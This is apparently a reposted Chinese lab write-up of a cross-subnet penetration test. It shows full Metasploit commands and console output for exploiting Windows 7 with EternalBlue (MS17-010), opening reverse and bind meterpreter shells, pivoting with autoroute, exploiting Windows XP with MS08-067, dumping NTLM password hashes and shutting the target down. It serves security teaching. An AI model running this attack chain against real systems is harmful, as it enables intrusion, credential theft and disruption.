Windows网络服务渗透测试实战-跨网段攻击

这篇具有很好参考价值的文章主要介绍了Windows网络服务渗透测试实战-跨网段攻击。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、实验项目名称

Windows网络服务渗透测试实战-跨网段攻击

二、实验目的及要求

掌握对跨网段攻击的方法。

熟悉Metasploit终端的使用方法。

熟悉通过meterpreter进行后渗透操作

获取winxp系统管理员admin的密码,并使xp系统关机

----基础配置----

1、选择win7

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

2、选择winXP

Windows网络服务渗透测试实战-跨网段攻击

 Windows网络服务渗透测试实战-跨网段攻击

3、选择kali

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

 4、查看kali的ip

Windows网络服务渗透测试实战-跨网段攻击

5、查看winXP的ip

Windows网络服务渗透测试实战-跨网段攻击

 6、查看win7的IP

Windows网络服务渗透测试实战-跨网段攻击

总结如下:

WinXP

Win7

Kali

网络适配器  桥接模式(自动)

192.168.43.99

网络适配器  桥接模式(自动)

192.168.43.89

网络适配器  NAT

192.168.232.128

网络适配器2  NAT

192.168.232.145

----开始跨网段攻击----

1、输入 msfconsole 启动metasploit

Windows网络服务渗透测试实战-跨网段攻击

2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描

use auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块

set rhosts (目标网段) //扫描目标网段内的主机

set threads 512 //设置扫描线程

run //执行

Windows网络服务渗透测试实战-跨网段攻击

3、设置攻击步骤进行攻击

use exploit/windows/smb/ms17_010_eternalblue //利用攻击模块

set rhost (目标IP) //设置目标IP

set lhost (监听主机IP) //设置监听IP

set payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷

run

4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段

Windows网络服务渗透测试实战-跨网段攻击

5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址

 Windows网络服务渗透测试实战-跨网段攻击

6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表

run autoroute -s 192.168.232.128/24

run autoroute -p //查看路由表状况 

Windows网络服务渗透测试实战-跨网段攻击

7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击

backgroup
search ms08-067

use exploit/windows/smb/ms08_067_netapi //利用攻击模块

set payload windows/meterpreter/bind_tcp //设置攻击载荷

set rhost (目标IP) //设置监听IP

run

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

8、获取winxp系统管理员admin的密码

Windows网络服务渗透测试实战-跨网段攻击

9、使xp系统关机

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

Windows网络服务渗透测试实战-跨网段攻击

 关机之后kali中会失去会话

Windows网络服务渗透测试实战-跨网段攻击

 文章来源地址https://www.toymoban.com/news/detail-458046.html

┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.43.89/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0
       valid_lft 2911sec preferred_lft 2911sec
    inet6 240e:468:81:203c:da81:9549:e675:f2e0/64 scope global temporary dynamic 
       valid_lft 3538sec preferred_lft 3538sec
    inet6 240e:468:81:203c:20c:29ff:fe68:f4d1/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 3538sec preferred_lft 3538sec
    inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
                                                                                                                                      
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.99
rhosts => 192.168.43.99
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 512
threads => 512
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.43.99:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.43.99
rhost => 192.168.43.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.43.89
lhost => 192.168.43.89
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.43.89:4444 
[*] 192.168.43.99:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.43.99:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445     - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.43.99:445 - The target is vulnerable.
[*] 192.168.43.99:445 - Connecting to target for exploitation.
[+] 192.168.43.99:445 - Connection established for exploitation.
[+] 192.168.43.99:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.43.99:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.43.99:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.43.99:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.43.99:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.43.99:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.43.99:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.43.99:445 - Sending all but last fragment of exploit packet
[*] 192.168.43.99:445 - Starting non-paged pool grooming
[+] 192.168.43.99:445 - Sending SMBv2 buffers
[+] 192.168.43.99:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.43.99:445 - Sending final SMBv2 buffers.
[*] 192.168.43.99:445 - Sending last fragment of exploit packet!
[*] 192.168.43.99:445 - Receiving response from exploit packet
[+] 192.168.43.99:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.43.99:445 - Sending egg to corrupted connection.
[*] 192.168.43.99:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.43.99
[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > shell
Process 7924 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter �������� 2:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::e970:4199:33c6:f0f3%21
   IPv4 Address. . . . . . . . . . . : 192.168.232.145
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.232.2

Ethernet adapter Bluetooth ��������:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 240e:468:81:203c:6d7a:d608:7ec3:80e
   Temporary IPv6 Address. . . . . . : 240e:468:81:203c:b1e9:713c:1d5d:3a38
   Link-local IPv6 Address . . . . . : fe80::6d7a:d608:7ec3:80e%11
   IPv4 Address. . . . . . . . . . . : 192.168.43.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::284a:4a93:2ef9:661b%11
                                       192.168.43.1

Tunnel adapter isatap.{D0C9B1FF-3866-45AB-BD3C-6BCCE51D708F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter isatap.{AA43B9EC-6828-4E2A-ACED-837F5FF4C2C8}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>arp -a
arp -a

Interface: 192.168.43.99 --- 0xb
  Internet Address      Physical Address      Type
  192.168.43.1          12-2b-33-95-ca-ca     dynamic   
  192.168.43.89         00-0c-29-68-f4-d1     dynamic   
  192.168.43.107        50-e0-85-a8-bc-86     dynamic   
  192.168.43.162        50-e0-85-a8-bc-86     dynamic   
  192.168.43.170        50-e0-85-a8-bc-86     dynamic   
  192.168.43.223        c0-3c-59-b9-be-3c     dynamic   
  192.168.43.255        ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

Interface: 192.168.232.145 --- 0x15
  Internet Address      Physical Address      Type
  192.168.232.1         00-50-56-c0-00-08     dynamic   
  192.168.232.2         00-50-56-fb-6f-4e     dynamic   
  192.168.232.128       00-0c-29-52-81-07     dynamic   
  192.168.232.254       00-50-56-e3-a4-9f     dynamic   
  192.168.232.255       ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

C:\Windows\system32>exit
meterpreter > run autoroute -s 192.168.232.128/24                                                                                      
                                                                                                                                       
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.                                                               
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.232.128/255.255.255.0...
[+] Added route to 192.168.232.128/255.255.255.0 via 192.168.43.99
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.232.128    255.255.255.0      Session 1

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.232.128
rhost => 192.168.232.128
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] 192.168.232.128:445 - Automatically detecting the target...
[*] 192.168.232.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.232.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.232.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.232.128:4444
[*] Sending stage (175174 bytes) to 192.168.232.128
[*] Meterpreter session 2 opened (192.168.232.145:51366 -> 192.168.232.128:4444) at 2022-05-18 22:38:20 -0400

meterpreter > shell
Process 7092 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.232.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.254

C:\WINDOWS\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>exit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
meterpreter > shell
Process 8096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>shutdown -s -t 5
shutdown -s -t 5

C:\WINDOWS\system32>
[*] 192.168.232.128 - Meterpreter session 2 closed.  Reason: Died

到了这里,关于Windows网络服务渗透测试实战-跨网段攻击的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【samba】Windows映射网络驱动服务器提示“拒绝访问”

    按照以下步骤检查你的samba服务器,如果不确定自己是否正确地配置了samba环境,请参考Ubuntu安装Samba服务 1、检查进程是否起来 2、检查配置文件是否正确 3、检查防火墙是否放行samba报文 4、检查用户是否添加正确 5、尝试断开驱动器的连接 (1)方法一:最简单粗暴的方法是

    2024年02月05日
    浏览(40)
  • 实战 | 服务端开发与计算机网络结合的完美案例

    前言 大家好,我是Martin 后端,可以说是仅次于算法岗之外竞争最为激烈的岗位,而其中的服务端开发也是很多人会选择在秋招中投递的一个岗位,我想对于很多人来说,走上服务端开发之路的起点就是一个回声服务器了。 今天带大家实战一把,真实体验服务端底层数据交换

    2024年02月08日
    浏览(47)
  • 03 python网络应用实战(三)tcp服务端设计实现

    创建 socket 对象 绑定IP 和端口 设置监听 阻塞等待客户端的链接 新的 socket 收信息 新的 socket 发信息 关闭   通常服务器在启动的时候都会绑定一个众所周知的地址(如ip地址+端口号), 用于提供服务 ,客户就可以通过它来接连服务器;而 客户端就不用指定,有系统自动分配

    2024年02月07日
    浏览(32)
  • 如何实现远程公共网络下访问Windows Node.js服务端

    Node.js 是能够在服务器端运行 JavaScript 的开放源代码、跨平台运行环境。Node.js 由 OpenJS Foundation(原为 Node.js Foundation,已与 JS Foundation 合并)持有和维护,亦为 Linux 基金会的项目。Node.js 采用 Google 开发的 V8 运行代码,使用事件驱动、非阻塞和异步输入输出模型等技术来提高

    2024年02月05日
    浏览(40)
  • 记一次网络安全渗透测试实战指南

    网址已无法访问,就不贴了 可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主要分三步: 指纹识别、漏洞验证、漏洞复现。 指纹识别很好理解,我们要拿历史漏洞怼它,首

    2024年02月08日
    浏览(57)
  • Ubuntu搭建Samba服务器映射至Windows报错:“无法映射网络驱动器,找不到网络路径”

    试了很多其他博主分享的解决方法,还是映射失败,最后找到原因:配置文件中的共享目录不存在 解决:根据自己配置文件共享目录创建即可。 1:查看配置文件中共享文件的目录是否存在    2:目录不存在,进入对应文件夹创建 3:设置用户权限:确保 Samba 服务器上的用户

    2024年01月25日
    浏览(52)
  • Python网络编程实战:构建TCP服务器与客户端

    Python网络编程实战:构建TCP服务器与客户端 在信息化时代,网络编程是软件开发中不可或缺的一部分。Python作为一种功能强大的编程语言,提供了丰富的网络编程库和工具,使得开发者能够轻松构建各种网络应用。本文将详细介绍如何在Python中进行网络编程,特别是如何使用

    2024年04月15日
    浏览(44)
  • 【k8s完整实战教程5】网络服务配置(nodeport/loadbalancer/ingress)

    系列文章:这个系列已完结,如对您有帮助,求点赞收藏评论。 读者寄语: 再小的帆,也能远航! 【k8s完整实战教程0】前言 【k8s完整实战教程1】源码管理-Coding 【k8s完整实战教程2】腾讯云搭建k8s托管集群 【k8s完整实战教程3】k8s集群部署kubesphere 【k8s完整实战教程4】使用

    2024年02月13日
    浏览(69)
  • 一、重写muduo网络库之服务器编程及测试

    目录 一、基于muduo网络库开发服务器程序的基本步骤 1、组合TcpServer对象 2、创建EventLoop事件循环对象的指针 3、明确TCPServer构造函数需要的参数,输出ChatServer的构造函数 4、在当前服务器类的构造函数当中,注册处理连接的回调函数和处理读写事件的回调函数 5、设置合适的

    2024年02月04日
    浏览(41)
  • 【云服务器 ECS 实战】专有网络 VPC、弹性网卡的概述与配置

    阿里云在早期使用的是一种传统的网络模式,将所有的 ECS 云服务直接建立在传统网络层之上,这也就是 传统经典网络 模式,这种模式并未实现安全性隔离,存在一定的安全性隐患。于是出现了最新的 专有网络VPC 模式,在传统基础上加入了一层逻辑隔离的私有网络,不仅可

    2024年02月03日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包